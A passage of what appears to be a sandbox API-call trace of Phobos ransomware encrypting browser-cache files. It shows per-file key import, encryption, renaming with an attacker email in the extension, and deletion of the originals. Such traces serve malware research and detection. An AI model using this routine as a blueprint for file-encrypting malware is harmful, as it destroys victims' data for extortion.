CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.387] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.387] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.387] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.387] CloseHandle (hObject=0x180) returned 1 [0184.387] CloseHandle (hObject=0x14c) returned 1 [0184.387] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\BBu9sWQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bbu9swq[1].jpg")) returned 1 [0184.388] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.389] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=12478) returned 1 [0184.389] CloseHandle (hObject=0x14c) returned 1 [0184.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css")) returned 0x2020 [0184.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.389] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.389] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.390] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.390] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.390] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x30be, lpOverlapped=0x0) returned 1 [0184.397] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30c0, dwBufLen=0x30c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30c0) returned 1 [0184.397] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x30c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x30c0, lpOverlapped=0x0) returned 1 [0184.398] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0184.398] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.398] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.398] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.398] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.398] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.398] CloseHandle (hObject=0x14c) returned 1 [0184.398] CloseHandle (hObject=0x180) returned 1 [0184.398] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\bs-util[1].css" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\bs-util[1].css")) returned 1 [0184.399] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.399] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.400] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=152817) returned 1 [0184.400] CloseHandle (hObject=0x180) returned 1 [0184.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt")) returned 0x2020 [0184.400] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.400] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.400] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.401] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.401] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.401] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x254f1, lpOverlapped=0x0) returned 1 [0184.556] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x25500, dwBufLen=0x25500 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x25500) returned 1 [0184.557] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x25500, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x25500, lpOverlapped=0x0) returned 1 [0184.560] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0184.560] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.560] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60, dwBufLen=0x60 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x60) returned 1 [0184.560] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.560] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x112, lpOverlapped=0x0) returned 1 [0184.560] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.560] CloseHandle (hObject=0x180) returned 1 [0184.560] CloseHandle (hObject=0x14c) returned 1 [0184.560] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\c7-bdbd0d-91cdfbc1[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\c7-bdbd0d-91cdfbc1[1].txt")) returned 1 [0184.563] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.564] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=43) returned 1 [0184.564] CloseHandle (hObject=0x14c) returned 1 [0184.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif")) returned 0x2020 [0184.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.564] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.564] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.567] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.567] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.567] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2b, lpOverlapped=0x0) returned 1 [0184.586] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30, dwBufLen=0x30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x30) returned 1 [0184.586] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x30, lpOverlapped=0x0) returned 1 [0184.590] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32a68) returned 1 [0184.590] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.590] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0184.590] CryptDestroyKey (hKey=0xa32a68) returned 1 [0184.590] WriteFile (in: hFile=0x180, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0184.590] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.590] CloseHandle (hObject=0x14c) returned 1 [0184.590] CloseHandle (hObject=0x180) returned 1 [0184.591] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\collect[1].gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\collect[1].gif")) returned 1 [0184.591] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.592] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1969) returned 1 [0184.592] CloseHandle (hObject=0x180) returned 1 [0184.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js")) returned 0x2020 [0184.593] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0184.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0184.593] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.593] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0184.593] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.593] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32aa8) returned 1 [0184.593] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.593] ReadFile (in: hFile=0x180, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7b1, lpOverlapped=0x0) returned 1 [0184.706] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0184.706] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0184.707] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa328a8) returned 1 [0184.707] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0184.707] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0184.707] CryptDestroyKey (hKey=0xa328a8) returned 1 [0184.707] WriteFile (in: hFile=0x14c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0184.707] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0184.707] CloseHandle (hObject=0x180) returned 1 [0184.708] CloseHandle (hObject=0x14c) returned 1 [0184.708] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\ContainerTag[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\containertag[1].js")) returned 1 [0184.709] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\only[1].htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\only[1].htm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0184.710] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0184.710] CloseHandle (hObject=0x14c) returned 1 [0184.710] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0184.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[1].js"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0184.719] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=27501) returned 1 [0184.719] CloseHandle (hObject=0x140) returned 1 [0184.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\player[1].js")) returned 0x2020 [0184.719] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\player[1].js.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet 